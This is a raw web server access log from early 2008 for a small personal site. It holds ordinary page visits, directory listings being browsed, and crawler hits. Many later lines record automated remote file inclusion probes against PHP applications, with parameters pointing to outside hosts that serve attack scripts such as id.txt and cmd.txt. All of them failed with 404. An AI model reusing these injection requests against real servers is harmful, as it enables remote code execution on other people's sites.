83.44.192.111 - - [30/Jan/2008:11:58:15 -0800] "GET /logs/access_070831.log HTTP/1.1" 200 35113 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:15 -0800] "GET /minamijewelry/html/schedule.html HTTP/1.1" 200 12759 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:16 -0800] "GET /bikes/dteel/2008_01_27/?A HTTP/1.1" 200 5050 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:17 -0800] "GET /logs/access_070707.log HTTP/1.1" 200 48967 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:18 -0800] "GET /bikes/dteel/140CANON/?D=A HTTP/1.1" 200 987 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:18 -0800] "GET /bikes/dteel/EQ2/?D=A HTTP/1.1" 200 841 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:19 -0800] "GET /logs/access_071101.log HTTP/1.1" 200 4709 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:19 -0800] "GET /minamijewelry/source_images/batch1/?D=D HTTP/1.1" 200 5032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:20 -0800] "GET /logs/access_070730.log HTTP/1.1" 200 41451 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:21 -0800] "GET /minamijewelry/source_images/updated1/?N=A HTTP/1.1" 200 1443 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:22 -0800] "GET /minamijewelry/html/flower.html HTTP/1.1" 200 20957 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:23 -0800] "GET /bikes/dteel/EQ2/?D=D HTTP/1.1" 200 841 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:23 -0800] "GET /logs/access_080103.log HTTP/1.1" 200 448825 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:25 -0800] "GET /bikes/dteel/140CANON/?D=D HTTP/1.1" 200 987 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:25 -0800] "GET /logs/access_071225.log HTTP/1.1" 200 195051 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:25 -0800] "GET /bikes/dteel/2008_01_27/Medium/?N=A HTTP/1.1" 200 4825 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:27 -0800] "GET /logs/access_070901.log HTTP/1.1" 200 28607 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:27 -0800] "GET /logs/access_070823.log HTTP/1.1" 200 56843 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:28 -0800] "GET /minamijewelry/source_images/updated1/?N=D HTTP/1.1" 200 1443 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:29 -0800] "GET /minamijewelry/html/clearance.html HTTP/1.1" 200 12258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:29 -0800] "GET /bikes/dteel/03MAR07/ HTTP/1.1" 200 708 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:30 -0800] "GET /bikes/dteel/03MAR07/?M=A HTTP/1.1" 200 708 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:30 -0800] "GET /bikes/dteel/03MAR07/?D=A HTTP/1.1" 200 708 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:31 -0800] "GET /bikes/dteel/03MAR07/?M=D HTTP/1.1" 200 708 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:31 -0800] "GET /bikes/dteel/03MAR07/?D=D HTTP/1.1" 200 708 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:32 -0800] "GET /bikes/dteel/03MAR07/?N=A HTTP/1.1" 200 708 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:32 -0800] "GET /bikes/dteel/03MAR07/?N=D HTTP/1.1" 200 708 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:33 -0800] "GET /bikes/dteel/03MAR07/?A HTTP/1.1" 200 708 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:33 -0800] "GET /megumi/Necklace/?N=A HTTP/1.1" 200 4323 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:34 -0800] "GET /bikes/dteel/2008_01_27/Medium/?N=D HTTP/1.1" 200 4825 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:34 -0800] "GET /logs/access_070722.log HTTP/1.1" 200 78392 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:35 -0800] "GET /megumi/Necklace/?N=D HTTP/1.1" 200 4323 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:36 -0800] "GET /logs/access_070815.log HTTP/1.1" 200 31884 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:36 -0800] "GET /logs/access_071217.log HTTP/1.1" 200 231335 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:37 -0800] "GET /bikes/dteel/WeSTOC07/ HTTP/1.1" 200 706 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:38 -0800] "GET /bikes/dteel/WeSTOC07/?N=D HTTP/1.1" 200 706 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:39 -0800] "GET /bikes/dteel/WeSTOC07/?M=A HTTP/1.1" 200 706 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:39 -0800] "GET /bikes/dteel/WeSTOC07/?N=A HTTP/1.1" 200 706 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:39 -0800] "GET /bikes/dteel/WeSTOC07/?M=D HTTP/1.1" 200 706 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:40 -0800] "GET /bikes/dteel/WeSTOC07/?D=A HTTP/1.1" 200 706 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:40 -0800] "GET /bikes/dteel/WeSTOC07/?A HTTP/1.1" 200 706 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:41 -0800] "GET /bikes/dteel/WeSTOC07/?D=D HTTP/1.1" 200 706 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:41 -0800] "GET /logs/access_070714.log HTTP/1.1" 200 51386 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:43 -0800] "GET /logs/access_071209.log HTTP/1.1" 200 44097 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:44 -0800] "GET /minamijewelry/minami_site3.psd HTTP/1.1" 200 524288 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:45 -0800] "GET /logs/access_070807.log HTTP/1.1" 200 47717 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:46 -0800] "GET /minamijewelry/flower.psd HTTP/1.1" 200 109558 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:47 -0800] "GET /logs/access_080110.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:48 -0800] "GET /logs/access_070830.log HTTP/1.1" 200 30370 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:49 -0800] "GET /minamijewelry/source_images/?N=A HTTP/1.1" 200 2414 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:49 -0800] "GET /logs/access_070706.log HTTP/1.1" 200 26632 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:49 -0800] "GET /bikes/GPS/?A HTTP/1.1" 200 816 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:58:50 -0800] "GET /logs/?N=A HTTP/1.1" 200 32398 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
87.230.9.115 - - [30/Jan/2008:11:59:13 -0800] "GET //public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.skanray.dk/hjem//cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.230.9.115 - - [30/Jan/2008:11:59:13 -0800] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.skanray.dk/hjem//cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:59:18 -0800] "GET /retreat1/webcam/?M=A HTTP/1.1" 200 458363 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:11:59:20 -0800] "GET /logs/access_080102.log HTTP/1.1" 200 356516 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:12:00:13 -0800] "GET /retreat1/webcam/?D=A HTTP/1.1" 200 458363 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:12:00:20 -0800] "GET /retreat1/webcam/?A HTTP/1.1" 200 523934 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:12:00:21 -0800] "GET /minamijewelry/source_images/?N=D HTTP/1.1" 200 2414 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:12:00:22 -0800] "GET /logs/access_071224.log HTTP/1.1" 200 205925 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:12:00:25 -0800] "GET /logs/?N=D HTTP/1.1" 200 32398 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:12:00:32 -0800] "GET /minamijewelry/source_images/?A HTTP/1.1" 200 2414 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:12:00:36 -0800] "GET /retreat1/webcam/?M=D HTTP/1.1" 200 458363 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:12:01:13 -0800] "GET /logs/access_070822.log HTTP/1.1" 200 49732 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
83.44.192.111 - - [30/Jan/2008:12:01:25 -0800] "GET /retreat1/webcam/?D=D HTTP/1.1" 200 458363 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
66.151.162.98 - - [30/Jan/2008:12:02:12 -0800] "GET /logs/access_071229.log/link.php?do=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.151.162.98 - - [30/Jan/2008:12:02:13 -0800] "GET /logs/link.php?do=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.81.88.20 - - [30/Jan/2008:12:02:40 -0800] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.81.88.20 - - [30/Jan/2008:12:02:40 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.81.88.20 - - [30/Jan/2008:12:02:41 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.35.179 - - [30/Jan/2008:12:06:21 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
124.81.88.20 - - [30/Jan/2008:12:06:53 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.116.188.138 - - [30/Jan/2008:12:09:50 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://jabujabujabu.angelfire.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.148 - - [30/Jan/2008:12:10:28 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.148 - - [30/Jan/2008:12:10:29 -0800] "GET /logs/access_070822.log HTTP/1.0" 200 49732 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:18 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:18 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:18 -0800] "GET //appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:18 -0800] "GET //appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:18 -0800] "GET /logs//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:18 -0800] "GET /logs//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:26 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:26 -0800] "GET //appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:26 -0800] "GET /logs//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:27 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:27 -0800] "GET //appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:28 -0800] "GET /logs//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:29 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:29 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:30 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:30 -0800] "GET //appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:30 -0800] "GET /logs//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:35 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:35 -0800] "GET //appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:35 -0800] "GET /logs//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:36 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:38 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:39 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:39 -0800] "GET //appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:40 -0800] "GET /logs//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:40 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:42 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:42 -0800] "GET //appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:42 -0800] "GET /logs//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:45 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:48 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:48 -0800] "GET //appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:48 -0800] "GET /logs//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:49 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:53 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:12:58 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:13:33 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:13:34 -0800] "GET //appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:13:34 -0800] "GET /logs//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.76.13.95 - - [30/Jan/2008:12:13:49 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.69.222.121 - - [30/Jan/2008:12:20:26 -0800] "GET /logs/access_071230.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.222.121 - - [30/Jan/2008:12:20:26 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.222.121 - - [30/Jan/2008:12:20:27 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.116.188.138 - - [30/Jan/2008:12:21:26 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://jabujabujabu.angelfire.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.116.188.138 - - [30/Jan/2008:12:21:27 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://jabujabujabu.angelfire.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.230.197.170 - - [30/Jan/2008:12:22:23 -0800] "GET /logs/access_071214.log/includes/functions_install.php?vwar_root=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.197.170 - - [30/Jan/2008:12:22:23 -0800] "GET /logs/includes/functions_install.php?vwar_root=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.100.219.165 - - [30/Jan/2008:12:24:41 -0800] "GET //modules/xfsection/modify.php?dir_module=http://thesoutherngospelshow.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.139.98 - - [30/Jan/2008:12:24:58 -0800] "GET /logs/access.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [30/Jan/2008:12:24:58 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
